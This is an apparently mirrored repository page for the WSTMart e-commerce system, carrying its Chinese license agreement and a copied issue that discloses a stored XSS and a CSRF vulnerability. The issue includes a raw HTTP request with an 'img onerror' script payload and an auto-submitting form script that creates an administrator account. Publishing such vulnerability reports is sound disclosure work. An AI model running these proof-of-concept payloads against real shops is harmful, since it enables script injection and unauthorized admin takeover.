Code Monkey home page Code Monkey logo

wstmart's Introduction

WSTMart安装协议

版权所有(c)2016,广州商淘信息科技有限公司

用户须知:

感谢您选择WSTMart电子商务系统(以下简称WSTMart),WSTMart电子商务系统由广州商淘信息科技有限公司(以下简称本公司)基于ThinkPHP框架开发并发布的多用户电商系统。本协议是您与广州商淘信息科技有限公司之间关于您使用WSTMart电子商务系统的法律协议。无论您是个人或组织 、盈利与否、用途如何(包括以学习和研究为目的),均需仔细阅读本协议。

使用协议:

  1. WSTMart不是一个自由软件!【未经授权】您只能在不用于商业目的的前提下对程序代码进行修改和使用;不允许对程序代码以任何形式任何目的的再发布。
  2. 未经本公司书面授权许可无论用途如何、是否经过修改或美化、修改程度如何,只要使用本软件的整体或任何部分,软件首页顶部及页脚处的版权标识(Powered by WSTMart)和本公司下属网站(http://www.wstmart.net) 的链接都必须保留,不能清除或修改。

限制条款:

  1. 用户可通过购买《WSTMart商业授权许可》以获得约定的WSTMart电子商务系统的使用授权。
  2. 禁止在 WSTMart的整体或任何部分基础上以发展任何派生版本、修改版本或第三方版本用于重新分发。
  3. 授权用户可以根据需要对WSTMart进行必要的修改和美化,以适应用户的网站要求。WSTMart持有产品的全部版权。授权用户可以去除WSTMart网络外在的版权信息,去除外在版权信息后的产品的所有版权仍归本公司所有。

免责条款:

  1. WSTMart及所附带的文件是作为不提供任何明确的或隐含的赔偿或担保的形式出售的。
  2. 用户同意自己承担使用本产品的风险,在适用法律允许的最大范围内,WSTMart在任何情况下不就因使用或不能使用本产品所发生的特殊的、意外的、非直接或间接的损失承担赔偿责任。即使用户已事先被WSTMart告知该损害发生的可能性。
  3. 用户利用本产品构建的网站的任何信息内容以及导致的任何版权纠纷和法律争议及后果与WSTMart无关,WSTMart对此不承担任何责任。

其他条款: 用户一旦开始安装使用WSTMart,即被视为完全理解并接受本协议的各项条款,在享有上述条款授予的权力的同时,受到相关的约束和限制。协议许可范围以外的行为,造成违反本协议并构成侵权的,WSTMart有权随时终止授权,责令停止损害,并保留追究相关责任的权力。


联系我们: 广州商淘信息科技有限公司 WSTMart官方网站:http://www.wstmart.net WSTMart演示站:http://demo.wstmart.com 客服 Q Q:153289970 交流QQ群:590755485 联系电话: 020-85289921/15918671994 联系邮箱: [email protected]

wstmart's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

wstmart's Issues

There are XSS vulnerabilities and CSRF vulnerabilities that can work together to add administrator users

Shang tao software WSTMart e-commerce system is a based on THINKPHP framework 5.1 build B2B2C electric business platform, is now open source shopping system based on THINKPHP 5 is the most perfect, with PC, mobile phone WAP, micro mall, android APP, the APP, WeChat applet, six side one, six side each other, have nowadays one of the most popular level 3 distribution and function of micro bargaining, very suitable for enterprise and individual fast online business platform.

The code of the system is clear and easy to understand, a large number of visual reports are convenient for operators to make decisions, rich marketing functions make the application scenarios of the system broad, good plug-in mechanism makes the system more easy to expand. System operation is simple, safe and stable, update iteration is fast, is the majority of users direct use and secondary development of the best choice.

Official address: http://www.wstmart.net

0x01 stored XSS
Function point: mall some commodity details - commodity consultation
poc:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454

goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E

0x02 CSRF

18/5000
Function point: background management - staff management - login account
poc:
1234.html

<title>Document</title> <script type="text/javascript"> test.staffId.value="0"; test.loginName.value="admin3"; test.staffPhoto.value=""; test.loginPwd.value="admin3"; test.staffName.value="admin3"; test.staffNo.value=""; test.RoleId.value="0"; test.staffPhone.value=""; test.wxOpenId.value=""; test.workStatus.value="1"; test.staffStatus.value="1"; test.submit(); </script>

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.